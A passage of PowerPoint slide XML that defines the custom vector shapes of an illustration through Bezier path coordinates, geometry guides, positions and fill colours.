                      <a:pt x="1117622" y="1021760"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1115336" y="984044"/>
                      <a:pt x="1104478" y="948614"/>
                      <a:pt x="1093049" y="913184"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1080477" y="872039"/>
                      <a:pt x="1078763" y="820037"/>
                      <a:pt x="1097049" y="776606"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1096478" y="776606"/>
                      <a:pt x="1138766" y="705175"/>
                      <a:pt x="1151909" y="682316"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1161052" y="664030"/>
                      <a:pt x="1179339" y="655458"/>
                      <a:pt x="1192482" y="640600"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1187339" y="619457"/>
                      <a:pt x="1181053" y="598313"/>
                      <a:pt x="1175339" y="576597"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="76564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8B3EB74-15CD-431A-BFED-65572A3F91F8}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="9744587" y="3486687"/>
                <a:ext cx="1110799" cy="599993"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="connsiteX0" fmla="*/ 1079596 w 1131598"/>
                  <a:gd name="connsiteY0" fmla="*/ 7429 h 611228"/>
                  <a:gd name="connsiteX1" fmla="*/ 1131599 w 1131598"/>
                  <a:gd name="connsiteY1" fmla="*/ 0 h 611228"/>
                  <a:gd name="connsiteX2" fmla="*/ 1073882 w 1131598"/>
                  <a:gd name="connsiteY2" fmla="*/ 102862 h 611228"/>
                  <a:gd name="connsiteX3" fmla="*/ 983592 w 1131598"/>
                  <a:gd name="connsiteY3" fmla="*/ 124006 h 611228"/>
                  <a:gd name="connsiteX4" fmla="*/ 867587 w 1131598"/>
                  <a:gd name="connsiteY4" fmla="*/ 158864 h 611228"/>
                  <a:gd name="connsiteX5" fmla="*/ 840728 w 1131598"/>
                  <a:gd name="connsiteY5" fmla="*/ 212581 h 611228"/>
                  <a:gd name="connsiteX6" fmla="*/ 847586 w 1131598"/>
                  <a:gd name="connsiteY6" fmla="*/ 314300 h 611228"/>
                  <a:gd name="connsiteX7" fmla="*/ 788726 w 1131598"/>
                  <a:gd name="connsiteY7" fmla="*/ 425162 h 611228"/>
                  <a:gd name="connsiteX8" fmla="*/ 653863 w 1131598"/>
                  <a:gd name="connsiteY8" fmla="*/ 466878 h 611228"/>
                  <a:gd name="connsiteX9" fmla="*/ 533286 w 1131598"/>
                  <a:gd name="connsiteY9" fmla="*/ 425733 h 611228"/>
                  <a:gd name="connsiteX10" fmla="*/ 452139 w 1131598"/>
                  <a:gd name="connsiteY10" fmla="*/ 354873 h 611228"/>
                  <a:gd name="connsiteX11" fmla="*/ 383565 w 1131598"/>
                  <a:gd name="connsiteY11" fmla="*/ 381732 h 611228"/>
                  <a:gd name="connsiteX12" fmla="*/ 378993 w 1131598"/>
                  <a:gd name="connsiteY12" fmla="*/ 448592 h 611228"/>
                  <a:gd name="connsiteX13" fmla="*/ 357849 w 1131598"/>
                  <a:gd name="connsiteY13" fmla="*/ 542310 h 611228"/>
                  <a:gd name="connsiteX14" fmla="*/ 327562 w 1131598"/>
                  <a:gd name="connsiteY14" fmla="*/ 578883 h 611228"/>
                  <a:gd name="connsiteX15" fmla="*/ 216700 w 1131598"/>
                  <a:gd name="connsiteY15" fmla="*/ 609742 h 611228"/>
                  <a:gd name="connsiteX16" fmla="*/ 82980 w 1131598"/>
                  <a:gd name="connsiteY16" fmla="*/ 508594 h 611228"/>
                  <a:gd name="connsiteX17" fmla="*/ 18406 w 1131598"/>
                  <a:gd name="connsiteY17" fmla="*/ 432591 h 611228"/>
                  <a:gd name="connsiteX18" fmla="*/ 20691 w 1131598"/>
                  <a:gd name="connsiteY18" fmla="*/ 368588 h 611228"/>
                  <a:gd name="connsiteX19" fmla="*/ 138982 w 1131598"/>
                  <a:gd name="connsiteY19" fmla="*/ 308585 h 611228"/>
                  <a:gd name="connsiteX20" fmla="*/ 253845 w 1131598"/>
                  <a:gd name="connsiteY20" fmla="*/ 277727 h 611228"/>
                  <a:gd name="connsiteX21" fmla="*/ 482998 w 1131598"/>
                  <a:gd name="connsiteY21" fmla="*/ 202295 h 611228"/>
                  <a:gd name="connsiteX22" fmla="*/ 762439 w 1131598"/>
                  <a:gd name="connsiteY22" fmla="*/ 105148 h 611228"/>
                  <a:gd name="connsiteX23" fmla="*/ 902445 w 1131598"/>
                  <a:gd name="connsiteY23" fmla="*/ 57717 h 611228"/>
                  <a:gd name="connsiteX24" fmla="*/ 1079596 w 1131598"/>
                  <a:gd name="connsiteY24" fmla="*/ 7429 h 61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31598" h="611228">
                    <a:moveTo>
                      <a:pt x="1079596" y="7429"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="1096740" y="5143"/>
                      <a:pt x="1114455" y="2286"/>
                      <a:pt x="1131599" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1109883" y="36002"/>
                      <a:pt x="1096169" y="58860"/>
                      <a:pt x="1073882" y="102862"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1051595" y="108005"/>
                      <a:pt x="1020736" y="115434"/>
                      <a:pt x="983592" y="124006"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="943590" y="133149"/>
                      <a:pt x="904731" y="142292"/>
                      <a:pt x="867587" y="158864"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="844729" y="168579"/>
                      <a:pt x="839585" y="189723"/>
                      <a:pt x="840728" y="212581"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="842443" y="246868"/>
                      <a:pt x="844729" y="280584"/>
                      <a:pt x="847586" y="314300"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="852729" y="365159"/>
                      <a:pt x="832157" y="400590"/>
                      <a:pt x="788726" y="425162"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="747010" y="448592"/>
                      <a:pt x="701865" y="462878"/>
                      <a:pt x="653863" y="466878"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="608146" y="470878"/>
                      <a:pt x="568145" y="455449"/>
                      <a:pt x="533286" y="425733"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="505856" y="402304"/>
                      <a:pt x="480141" y="377160"/>
                      <a:pt x="452139" y="354873"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="413852" y="324015"/>
                      <a:pt x="390422" y="333729"/>
                      <a:pt x="383565" y="381732"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="380708" y="404018"/>
                      <a:pt x="378993" y="426305"/>
                      <a:pt x="378993" y="448592"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="378993" y="482307"/>
                      <a:pt x="374422" y="503451"/>
                      <a:pt x="357849" y="542310"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="350992" y="558882"/>
                      <a:pt x="340134" y="570311"/>
                      <a:pt x="327562" y="578883"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="294418" y="601741"/>
                      <a:pt x="258416" y="616028"/>
                      <a:pt x="216700" y="609742"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="148126" y="608027"/>
                      <a:pt x="113838" y="560597"/>
                      <a:pt x="82980" y="508594"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="65836" y="479450"/>
                      <a:pt x="49836" y="451449"/>
                      <a:pt x="18406" y="432591"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="-7881" y="416590"/>
                      <a:pt x="-5024" y="384589"/>
                      <a:pt x="20691" y="368588"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58407" y="345158"/>
                      <a:pt x="98409" y="326872"/>
                      <a:pt x="138982" y="308585"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="185842" y="287442"/>
                      <a:pt x="214415" y="283441"/>
                      <a:pt x="253845" y="277727"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="336134" y="271441"/>
                      <a:pt x="412138" y="246868"/>
                      <a:pt x="482998" y="202295"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="567573" y="149150"/>
                      <a:pt x="664720" y="125148"/>
                      <a:pt x="762439" y="105148"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="811013" y="95433"/>
                      <a:pt x="857872" y="79432"/>
                      <a:pt x="902445" y="57717"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="915589" y="50859"/>
                      <a:pt x="1032737" y="13715"/>
                      <a:pt x="1079596" y="7429"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="333231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9848B1D-635B-4153-8F65-46A7AF2680F7}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="10204893" y="3638127"/>
                <a:ext cx="353189" cy="291710"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="connsiteX0" fmla="*/ 191795 w 359802"/>
                  <a:gd name="connsiteY0" fmla="*/ 297173 h 297172"/>
                  <a:gd name="connsiteX1" fmla="*/ 5501 w 359802"/>
                  <a:gd name="connsiteY1" fmla="*/ 166310 h 297172"/>
                  <a:gd name="connsiteX2" fmla="*/ 28930 w 359802"/>
                  <a:gd name="connsiteY2" fmla="*/ 82877 h 297172"/>
                  <a:gd name="connsiteX3" fmla="*/ 274084 w 359802"/>
                  <a:gd name="connsiteY3" fmla="*/ 17 h 297172"/>
                  <a:gd name="connsiteX4" fmla="*/ 327230 w 359802"/>
                  <a:gd name="connsiteY4" fmla="*/ 35447 h 297172"/>
                  <a:gd name="connsiteX5" fmla="*/ 359802 w 359802"/>
                  <a:gd name="connsiteY5" fmla="*/ 185739 h 297172"/>
                  <a:gd name="connsiteX6" fmla="*/ 325515 w 359802"/>
                  <a:gd name="connsiteY6" fmla="*/ 247456 h 297172"/>
                  <a:gd name="connsiteX7" fmla="*/ 191795 w 359802"/>
                  <a:gd name="connsiteY7" fmla="*/ 297173 h 297172"/>
                  <a:gd name="connsiteX8" fmla="*/ 191795 w 359802"/>
                  <a:gd name="connsiteY8" fmla="*/ 297173 h 29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802" h="297172">
                    <a:moveTo>
                      <a:pt x="191795" y="297173"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="107791" y="296601"/>
                      <a:pt x="30073" y="239456"/>
                      <a:pt x="5501" y="166310"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="-5928" y="130880"/>
                      <a:pt x="-214" y="105736"/>
                      <a:pt x="28930" y="82877"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="100362" y="26303"/>
                      <a:pt x="183794" y="1731"/>
                      <a:pt x="274084" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="299228" y="-555"/>
                      <a:pt x="316372" y="13731"/>
                      <a:pt x="327230" y="35447"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="351802" y="82877"/>
                      <a:pt x="359231" y="133737"/>
                      <a:pt x="359802" y="185739"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="359802" y="211455"/>
                      <a:pt x="346087" y="232027"/>
                      <a:pt x="325515" y="247456"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="283799" y="279458"/>
                      <a:pt x="235797" y="293744"/>
                      <a:pt x="191795" y="297173"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="191795" y="2971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9761EE8-3A86-4C58-8D33-C4F84B406679}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="9812204" y="3789264"/>
                <a:ext cx="289931" cy="269206"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="connsiteX0" fmla="*/ 295252 w 295360"/>
                  <a:gd name="connsiteY0" fmla="*/ 139777 h 274247"/>
                  <a:gd name="connsiteX1" fmla="*/ 134674 w 295360"/>
                  <a:gd name="connsiteY1" fmla="*/ 272926 h 274247"/>
                  <a:gd name="connsiteX2" fmla="*/ 83243 w 295360"/>
                  <a:gd name="connsiteY2" fmla="*/ 253497 h 274247"/>
                  <a:gd name="connsiteX3" fmla="*/ 954 w 295360"/>
                  <a:gd name="connsiteY3" fmla="*/ 107776 h 274247"/>
                  <a:gd name="connsiteX4" fmla="*/ 34098 w 295360"/>
                  <a:gd name="connsiteY4" fmla="*/ 42630 h 274247"/>
                  <a:gd name="connsiteX5" fmla="*/ 260965 w 295360"/>
                  <a:gd name="connsiteY5" fmla="*/ 2057 h 274247"/>
                  <a:gd name="connsiteX6" fmla="*/ 290681 w 295360"/>
                  <a:gd name="connsiteY6" fmla="*/ 32915 h 274247"/>
                  <a:gd name="connsiteX7" fmla="*/ 295252 w 295360"/>
                  <a:gd name="connsiteY7" fmla="*/ 139777 h 274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360" h="274247">
                    <a:moveTo>
                      <a:pt x="295252" y="139777"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="290109" y="232924"/>
                      <a:pt x="230107" y="283212"/>
                      <a:pt x="134674" y="272926"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="115816" y="271212"/>
                      <a:pt x="96958" y="266069"/>
                      <a:pt x="83243" y="253497"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="39241" y="214066"/>
                      <a:pt x="9525" y="166064"/>
                      <a:pt x="954" y="107776"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="-3618" y="79203"/>
                      <a:pt x="8382" y="58059"/>
                      <a:pt x="34098" y="42630"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="104387" y="343"/>
                      <a:pt x="182104" y="-3658"/>
                      <a:pt x="260965" y="2057"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="278680" y="3200"/>
                      <a:pt x="288966" y="15772"/>
                      <a:pt x="290681" y="32915"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="294110" y="55774"/>
                      <a:pt x="295824" y="127777"/>
                      <a:pt x="295252" y="13977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64A3F22-A1D1-4C63-873E-E9665BE6F003}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="9480259" y="5736099"/>
                <a:ext cx="275042" cy="325357"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="connsiteX0" fmla="*/ 62530 w 280192"/>
                  <a:gd name="connsiteY0" fmla="*/ 21715 h 331449"/>
                  <a:gd name="connsiteX1" fmla="*/ 25957 w 280192"/>
                  <a:gd name="connsiteY1" fmla="*/ 17715 h 331449"/>
                  <a:gd name="connsiteX2" fmla="*/ 141391 w 280192"/>
                  <a:gd name="connsiteY2" fmla="*/ 0 h 331449"/>
                  <a:gd name="connsiteX3" fmla="*/ 279111 w 280192"/>
                  <a:gd name="connsiteY3" fmla="*/ 140006 h 331449"/>
                  <a:gd name="connsiteX4" fmla="*/ 265968 w 280192"/>
                  <a:gd name="connsiteY4" fmla="*/ 266298 h 331449"/>
                  <a:gd name="connsiteX5" fmla="*/ 211679 w 280192"/>
                  <a:gd name="connsiteY5" fmla="*/ 331444 h 331449"/>
                  <a:gd name="connsiteX6" fmla="*/ 49386 w 280192"/>
                  <a:gd name="connsiteY6" fmla="*/ 318300 h 331449"/>
                  <a:gd name="connsiteX7" fmla="*/ 5384 w 280192"/>
                  <a:gd name="connsiteY7" fmla="*/ 294299 h 331449"/>
                  <a:gd name="connsiteX8" fmla="*/ 813 w 280192"/>
                  <a:gd name="connsiteY8" fmla="*/ 278870 h 331449"/>
                  <a:gd name="connsiteX9" fmla="*/ 77959 w 280192"/>
                  <a:gd name="connsiteY9" fmla="*/ 268584 h 331449"/>
                  <a:gd name="connsiteX10" fmla="*/ 62530 w 280192"/>
                  <a:gd name="connsiteY10" fmla="*/ 21715 h 3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192" h="331449">
                    <a:moveTo>
                      <a:pt x="62530" y="21715"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="50529" y="17715"/>
                      <a:pt x="38529" y="18287"/>
                      <a:pt x="25957" y="17715"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63673" y="6858"/>
                      <a:pt x="103103" y="7429"/>
                      <a:pt x="141391" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="232252" y="6286"/>
                      <a:pt x="272825" y="47431"/>
                      <a:pt x="279111" y="140006"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="281968" y="182865"/>
                      <a:pt x="279683" y="225153"/>
                      <a:pt x="265968" y="266298"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="259110" y="288013"/>
                      <a:pt x="226537" y="332015"/>
                      <a:pt x="211679" y="331444"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="166535" y="329729"/>
                      <a:pt x="94531" y="327443"/>
                      <a:pt x="49386" y="318300"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="33386" y="312586"/>
                      <a:pt x="17385" y="306871"/>
                      <a:pt x="5384" y="294299"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1384" y="289727"/>
                      <a:pt x="-1473" y="284584"/>
                      <a:pt x="813" y="278870"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3099" y="273155"/>
                      <a:pt x="30528" y="311443"/>
                      <a:pt x="77959" y="268584"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="177392" y="181151"/>
                      <a:pt x="138533" y="46288"/>
                      <a:pt x="62530" y="2171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53CDACD-558C-414E-A723-5A371B1952AB}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="9498409" y="6253769"/>
                <a:ext cx="380922" cy="480822"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="connsiteX0" fmla="*/ 388056 w 388055"/>
                  <a:gd name="connsiteY0" fmla="*/ 11519 h 489825"/>
                  <a:gd name="connsiteX1" fmla="*/ 199476 w 388055"/>
                  <a:gd name="connsiteY1" fmla="*/ 280102 h 489825"/>
                  <a:gd name="connsiteX2" fmla="*/ 170903 w 388055"/>
                  <a:gd name="connsiteY2" fmla="*/ 444110 h 489825"/>
                  <a:gd name="connsiteX3" fmla="*/ 173760 w 388055"/>
                  <a:gd name="connsiteY3" fmla="*/ 489826 h 489825"/>
                  <a:gd name="connsiteX4" fmla="*/ 58898 w 388055"/>
                  <a:gd name="connsiteY4" fmla="*/ 419537 h 489825"/>
                  <a:gd name="connsiteX5" fmla="*/ 38 w 388055"/>
                  <a:gd name="connsiteY5" fmla="*/ 262958 h 489825"/>
                  <a:gd name="connsiteX6" fmla="*/ 23468 w 388055"/>
                  <a:gd name="connsiteY6" fmla="*/ 119524 h 489825"/>
                  <a:gd name="connsiteX7" fmla="*/ 158331 w 388055"/>
                  <a:gd name="connsiteY7" fmla="*/ 6376 h 489825"/>
                  <a:gd name="connsiteX8" fmla="*/ 185761 w 388055"/>
                  <a:gd name="connsiteY8" fmla="*/ 661 h 489825"/>
                  <a:gd name="connsiteX9" fmla="*/ 388056 w 388055"/>
                  <a:gd name="connsiteY9" fmla="*/ 11519 h 4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055" h="489825">
                    <a:moveTo>
                      <a:pt x="388056" y="11519"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="290908" y="76664"/>
                      <a:pt x="217762" y="159525"/>
                      <a:pt x="199476" y="280102"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="190332" y="340105"/>
                      <a:pt x="177189" y="383535"/>
                      <a:pt x="170903" y="444110"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="170332" y="453824"/>
                      <a:pt x="165760" y="482968"/>
                      <a:pt x="173760" y="489826"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="134902" y="458396"/>
                      <a:pt x="98328" y="441252"/>
                      <a:pt x="58898" y="419537"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23468" y="400107"/>
                      <a:pt x="-1105" y="327533"/>
                      <a:pt x="38" y="262958"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="610" y="213242"/>
                      <a:pt x="1181" y="164668"/>
                      <a:pt x="23468" y="119524"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="51469" y="61235"/>
                      <a:pt x="98900" y="26377"/>
                      <a:pt x="158331" y="6376"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="167474" y="4661"/>
                      <a:pt x="176618" y="2947"/>
                      <a:pt x="185761" y="661"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="205190" y="-2768"/>
                      <a:pt x="341768" y="8090"/>
                      <a:pt x="388056" y="1151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8" name="Graphic 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{04CC8433-6A29-4D08-A882-DF31D683DDC0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="716414" y="160075"/>
            <a:ext cx="6061857" cy="4947800"/>
            <a:chOff x="376890" y="2515673"/>
            <a:chExt cx="5080762" cy="414700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53B1947-5A83-4AC2-BD28-0CDF8C65BCE2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1971581" y="4229203"/>
              <a:ext cx="313572" cy="783935"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 30428 w 313572"/>
                <a:gd name="connsiteY0" fmla="*/ 783283 h 783935"/>
                <a:gd name="connsiteX1" fmla="*/ 8817 w 313572"/>
                <a:gd name="connsiteY1" fmla="*/ 775786 h 783935"/>
                <a:gd name="connsiteX2" fmla="*/ 879 w 313572"/>
                <a:gd name="connsiteY2" fmla="*/ 759026 h 783935"/>
                <a:gd name="connsiteX3" fmla="*/ 266385 w 313572"/>
                <a:gd name="connsiteY3" fmla="*/ 8817 h 783935"/>
                <a:gd name="connsiteX4" fmla="*/ 283144 w 313572"/>
                <a:gd name="connsiteY4" fmla="*/ 879 h 783935"/>
                <a:gd name="connsiteX5" fmla="*/ 304755 w 313572"/>
                <a:gd name="connsiteY5" fmla="*/ 8376 h 783935"/>
                <a:gd name="connsiteX6" fmla="*/ 312694 w 313572"/>
                <a:gd name="connsiteY6" fmla="*/ 25136 h 783935"/>
                <a:gd name="connsiteX7" fmla="*/ 47188 w 313572"/>
                <a:gd name="connsiteY7" fmla="*/ 774903 h 783935"/>
                <a:gd name="connsiteX8" fmla="*/ 30428 w 313572"/>
                <a:gd name="connsiteY8" fmla="*/ 783283 h 78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572" h="783935">
                  <a:moveTo>
                    <a:pt x="30428" y="783283"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="8817" y="775786"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1761" y="773139"/>
                    <a:pt x="-1768" y="765641"/>
                    <a:pt x="879" y="759026"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="266385" y="8817"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="269031" y="1761"/>
                    <a:pt x="276528" y="-1768"/>
                    <a:pt x="283144" y="879"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="304755" y="8376"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="311812" y="11022"/>
                    <a:pt x="315340" y="18520"/>
                    <a:pt x="312694" y="25136"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="47188" y="774903"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="44983" y="781960"/>
                    <a:pt x="37044" y="785488"/>
                    <a:pt x="30428" y="783283"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="373D42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0AEA3CE-B5A6-47DE-9097-37F5040598A7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="376890" y="3305107"/>
              <a:ext cx="1761755" cy="3357575"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 151163 w 1761754"/>
                <a:gd name="connsiteY0" fmla="*/ 3036672 h 3357575"/>
                <a:gd name="connsiteX1" fmla="*/ 154692 w 1761754"/>
                <a:gd name="connsiteY1" fmla="*/ 3032702 h 3357575"/>
                <a:gd name="connsiteX2" fmla="*/ 144989 w 1761754"/>
                <a:gd name="connsiteY2" fmla="*/ 3001830 h 3357575"/>
                <a:gd name="connsiteX3" fmla="*/ 106177 w 1761754"/>
                <a:gd name="connsiteY3" fmla="*/ 2978455 h 3357575"/>
                <a:gd name="connsiteX4" fmla="*/ 95592 w 1761754"/>
                <a:gd name="connsiteY4" fmla="*/ 2938320 h 3357575"/>
                <a:gd name="connsiteX5" fmla="*/ 164394 w 1761754"/>
                <a:gd name="connsiteY5" fmla="*/ 2764550 h 3357575"/>
                <a:gd name="connsiteX6" fmla="*/ 223494 w 1761754"/>
                <a:gd name="connsiteY6" fmla="*/ 2525948 h 3357575"/>
                <a:gd name="connsiteX7" fmla="*/ 305527 w 1761754"/>
                <a:gd name="connsiteY7" fmla="*/ 2215897 h 3357575"/>
                <a:gd name="connsiteX8" fmla="*/ 321405 w 1761754"/>
                <a:gd name="connsiteY8" fmla="*/ 2079175 h 3357575"/>
                <a:gd name="connsiteX9" fmla="*/ 328902 w 1761754"/>
                <a:gd name="connsiteY9" fmla="*/ 1830428 h 3357575"/>
                <a:gd name="connsiteX10" fmla="*/ 365068 w 1761754"/>
                <a:gd name="connsiteY10" fmla="*/ 1522141 h 3357575"/>
                <a:gd name="connsiteX11" fmla="*/ 356247 w 1761754"/>
                <a:gd name="connsiteY11" fmla="*/ 1488181 h 3357575"/>
                <a:gd name="connsiteX12" fmla="*/ 353600 w 1761754"/>
                <a:gd name="connsiteY12" fmla="*/ 1457749 h 3357575"/>
                <a:gd name="connsiteX13" fmla="*/ 461214 w 1761754"/>
                <a:gd name="connsiteY13" fmla="*/ 1122118 h 3357575"/>
                <a:gd name="connsiteX14" fmla="*/ 428136 w 1761754"/>
                <a:gd name="connsiteY14" fmla="*/ 964667 h 3357575"/>
                <a:gd name="connsiteX15" fmla="*/ 415346 w 1761754"/>
                <a:gd name="connsiteY15" fmla="*/ 977016 h 3357575"/>
                <a:gd name="connsiteX16" fmla="*/ 376094 w 1761754"/>
                <a:gd name="connsiteY16" fmla="*/ 1040085 h 3357575"/>
                <a:gd name="connsiteX17" fmla="*/ 320964 w 1761754"/>
                <a:gd name="connsiteY17" fmla="*/ 1197536 h 3357575"/>
                <a:gd name="connsiteX18" fmla="*/ 263628 w 1761754"/>
                <a:gd name="connsiteY18" fmla="*/ 1409235 h 3357575"/>
                <a:gd name="connsiteX19" fmla="*/ 253484 w 1761754"/>
                <a:gd name="connsiteY19" fmla="*/ 1434374 h 3357575"/>
                <a:gd name="connsiteX20" fmla="*/ 231432 w 1761754"/>
                <a:gd name="connsiteY20" fmla="*/ 1440108 h 3357575"/>
                <a:gd name="connsiteX21" fmla="*/ 199678 w 1761754"/>
                <a:gd name="connsiteY21" fmla="*/ 1415851 h 3357575"/>
                <a:gd name="connsiteX22" fmla="*/ 184241 w 1761754"/>
                <a:gd name="connsiteY22" fmla="*/ 1421143 h 3357575"/>
                <a:gd name="connsiteX23" fmla="*/ 168805 w 1761754"/>
                <a:gd name="connsiteY23" fmla="*/ 1495679 h 3357575"/>
                <a:gd name="connsiteX24" fmla="*/ 138814 w 1761754"/>
                <a:gd name="connsiteY24" fmla="*/ 1590502 h 3357575"/>
